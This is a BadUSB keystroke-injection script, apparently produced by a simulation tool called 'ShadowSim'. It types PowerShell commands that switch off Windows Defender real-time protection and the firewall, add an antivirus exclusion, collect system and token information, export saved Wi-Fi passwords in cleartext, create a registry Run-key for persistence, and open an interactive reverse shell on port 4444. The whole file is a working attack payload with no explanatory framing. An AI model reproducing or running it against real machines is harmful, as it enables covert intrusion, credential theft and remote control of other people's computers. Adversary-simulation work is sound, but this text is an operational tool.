REM Generated by ShadowSim
REM Timestamp: 2025-08-03T16:30:36.625573
DEFAULT_DELAY 200

GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING if ($PSVersionTable.PSVersion.Major -lt 5) `{ exit `}
ENTER
DELAY 200
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 200
STRING Add-MpPreference -ExclusionPath 'C:\Users\Public'
ENTER
DELAY 200
STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
ENTER
DELAY 200
STRING systeminfo | Out-File C:\Users\Public\sysinfo.txt
ENTER
DELAY 200
STRING whoami /all | Out-File C:\Users\Public\tokens.txt
ENTER
DELAY 200
STRING netsh wlan export profile key=clear folder=C:\Users\Public
ENTER
DELAY 200
STRING $path = `"C:\Users\Public\script.ps1`"
ENTER
DELAY 200
STRING New-ItemProperty -Path `"HKCU:\Software\Microsoft\Windows\CurrentVersion\Run`" -Name `"ShadowSimTask
ENTER
DELAY 200
STRING `" -Value `"powershell -ExecutionPolicy Bypass -File $path`" -PropertyType String -Force
ENTER
DELAY 200
STRING $client = New-Object System.Net.Sockets.TCPClient(`"127.0.0.1`",4444)
ENTER
DELAY 200
STRING $stream = $client.GetStream()
ENTER
DELAY 200
STRING [byte[]]$bytes = 0..65535|%`{0`}
ENTER
DELAY 200
STRING while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)`{
ENTER
DELAY 200
STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
ENTER
DELAY 200
STRING $sendback = (iex $data 2>&1 | Out-String )
ENTER
DELAY 200
STRING $sendback2 = $sendback + `"PS `" + (pwd).Path + `"> `"
ENTER
DELAY 200
STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
ENTER
DELAY 200
STRING $stream.Write($sendbyte,0,$sendbyte.Length)
ENTER
DELAY 200
STRING $stream.Flush()
ENTER
DELAY 200
STRING `}
ENTER
DELAY 200
STRING $client.Close()
ENTER
DELAY 200